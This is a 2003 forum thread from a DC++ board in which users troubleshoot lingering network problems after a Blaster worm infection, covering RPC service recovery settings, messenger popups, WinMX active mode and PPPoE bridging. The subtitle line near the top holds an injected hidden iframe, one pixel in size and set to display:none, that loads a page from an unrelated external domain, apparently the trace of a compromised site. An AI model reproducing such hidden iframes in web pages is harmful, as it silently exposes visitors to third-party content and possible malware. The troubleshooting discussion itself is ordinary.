Blaster Virus Fallout

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

Locked
jbyrd
Posts: 255
Joined: 2003-05-10 09:26
Location: no-la-usa-earth
Contact:

Blaster Virus Fallout

Post by jbyrd » 2003-08-19 14:43

Like many others out there, the blaster virus has affected me. I screwed up and disconnected my router (that's a long story) and about 5 minutes later...BAM virus hit and told me that my computer was going to shut down. I actually disabled it before my computer shut down...and ran the update and patch. All seemed fine...

Now, I CAN run active on DC++ (although many claim they can't)...but I can't run active on WinMX. If I hurry up and connect to WinMX, and search using a ".", I will get about 8 search results. But if I try to search again, nothing. I can try the "." again, but it won't return anything.

If that isn't aggravating enough, I then started receiving those "netsend" or messenger service popup windows. Like 15-20 of them. They wouldn't popup when I was using my computer...they would popup when I didn't use my computer for a while, and then came back and logged on. They ceased after I disabled the messenger service.

I was just wondering what your thoughts are on this. Do you think it is a coincidence? Do you think it was the Microsoft update that did it? Or was the Blaster Virus not completely removed from my computer, or maybe the patch didn't undo some changes the virus made to my computer?

I have searched and searched and searched about this for a week now...I can't really get anywhere. I'm hoping you could help. Thanks.
Hehe.

TheParanoidOne
Forum Moderator
Posts: 1420
Joined: 2003-04-22 14:37

Post by TheParanoidOne » 2003-08-19 15:48

I know that the worm takes advantage of an RPC vulnerability in Windows and attacks certain ports, but other than that I haven't looked into it at all. What exactly are the symptoms?
(Yes, I'm being lazy with research :) )
The world is coming to an end. Please log off.

DC++ Guide | Words

jbyrd
Posts: 255
Joined: 2003-05-10 09:26
Location: no-la-usa-earth
Contact:

Post by jbyrd » 2003-08-19 15:56

The symptoms are only those that I listed above. 8)
Hehe.

tetsuokin
Posts: 50
Joined: 2003-06-09 06:55

Post by tetsuokin » 2003-08-19 21:25

it's mainly port 135 that the blaster attacks...
Restoring Internet connectivity and preventing the computer from shutting down
In many cases, on both Windows 2000 and XP, changing the settings for the Remote Call Procedure (RPC) service may allow you to connect to the Internet to obtain downloads, and will stop the computer from shutting down.

Click Start > Run. (The Run dialog box appears.)
Type:

SERVICES.MSC /S

in the open line, and then click OK. (The Services window opens.)


In the right pane, locate the Remote Procedure Call (RPC) service.



--------------------------------------------------------------------------------
CAUTION: A service named Remote Procedure Call (RPC) Locator exists. Do not confuse the two.
--------------------------------------------------------------------------------



Right-click the Remote Procedure Call (RPC) service, and then click Properties.
Click the Recovery tab.
Using the drop-down lists, change First failure, Second failure, and Subsequent failures to "Restart the Service."
Click Apply, and then click OK.


--------------------------------------------------------------------------------
CAUTION: Make sure that you change these settings back once you have removed the worm.
--------------------------------------------------------------------------------

jbyrd
Posts: 255
Joined: 2003-05-10 09:26
Location: no-la-usa-earth
Contact:

Post by jbyrd » 2003-08-20 07:24

Yeah. Like I said in the initial post, I was able to disable it before it shut down (by selecting "Take No Action" in the RPC service pane).

The problem is, I am having weird things happen since I got infected. I can't go active on WinMX...and I started getting messenger service popups (I ran adaware, to no avail). I stopped the messenger service popups by disabling messenger service, but I still can't go active in WinMX.

The reason I bring this up is because there are so many people in the Help/Support forum that are having troubles going active in DC++. I can't figure out wtf could have caused it. It seems to be the patch provided by microsoft. Who knows, maybe the RIAA is behind this. :shock: (=
Hehe.

TheNOP
Posts: 275
Joined: 2003-07-07 21:41
Location: Quebec

Post by TheNOP » 2003-08-20 22:52

I screwed up and disconnected my router
could it be misconfiguration....
TheNOP

Have you read the FAQ?
Or the sticky ? It might give you idea.

jbyrd
Posts: 255
Joined: 2003-05-10 09:26
Location: no-la-usa-earth
Contact:

Post by jbyrd » 2003-08-21 07:24

Well, it is possible...but I didn't reset it. I just disconnected it from my modem and ran the lan cable straight to my computer. Again, it's a long story...I don't want to bore you with the details. :D
Hehe.

TheNOP
Posts: 275
Joined: 2003-07-07 21:41
Location: Quebec

Post by TheNOP » 2003-08-21 14:09

jbyrd do you have a firewall else then the router ?

the patch could confuse some firewalls, depending of firewall brend and rules setting. inbound firewall only.
I don't want to bore you with the details.
got somethings you don't want others to know ? :shock: :wink:
no need to reply to this one. :lol:
TheNOP

Have you read the FAQ?
Or the sticky ? It might give you idea.

jbyrd
Posts: 255
Joined: 2003-05-10 09:26
Location: no-la-usa-earth
Contact:

Post by jbyrd » 2003-08-21 14:19

No other firewalls...just the hardware one. I have a modem with a built in router and an additional router that is set on bridged ethernet...so it's not NATing, etc.

Oh, and my XP firewall is OFF! :wink:
TheNOP wrote:got somethings you don't want others to know ?
Hehe. :oops:

If you really want to know...it had to do with getting Medal of Honor to work behind the firewall with servers that use non-default connection ports. The reason I didn't want to tell you is because it was a stupid thing to do...and I really didn't have a good reason to expose my LAN like that, especially in the wake of an outbreak.

I thought I was invincible. Ha. That stupid worm proved me wrong. :x
Hehe.

theburger
Posts: 7
Joined: 2003-07-11 09:27

Post by theburger » 2003-08-22 08:05

hey, a friend of mine got that virus too.. it starts countdown and the cp shut down.. how do you get rid of it? he has no antivirus software.

thanks in advance

Xan1977
Forum Moderator
Posts: 627
Joined: 2003-06-05 20:15

Post by Xan1977 » 2003-08-22 08:52


jbyrd
Posts: 255
Joined: 2003-05-10 09:26
Location: no-la-usa-earth
Contact:

Post by jbyrd » 2003-08-22 08:52

Read the topic VIRUS ALERT!
Hehe.

TheNOP
Posts: 275
Joined: 2003-07-07 21:41
Location: Quebec

Post by TheNOP » 2003-08-22 10:16

to jbyrd

about bridged/half bridged modem.
it is possible (?), that the patch change something in your PPPoE settings.
i would take look at it if i were you.
since in bridge mode, the computer PPPoE handle the NAT thingy.

also one draw back when you're bridgeing, is you can't connect more then one puter to the modem, no hub will work here, router will help if the router handel the PPPoE connection.
TheNOP

Have you read the FAQ?
Or the sticky ? It might give you idea.

jbyrd
Posts: 255
Joined: 2003-05-10 09:26
Location: no-la-usa-earth
Contact:

Post by jbyrd » 2003-08-22 10:22

Thx. I'll check it out. Even though I have pretty much looked over all of my settings, I may have missed something.
Hehe.

TheNOP
Posts: 275
Joined: 2003-07-07 21:41
Location: Quebec

Post by TheNOP » 2003-08-22 10:25

you might have to re-install your "access manager" software.
or if using XP, re-create your PPPoE connection.
TheNOP

Have you read the FAQ?
Or the sticky ? It might give you idea.

Locked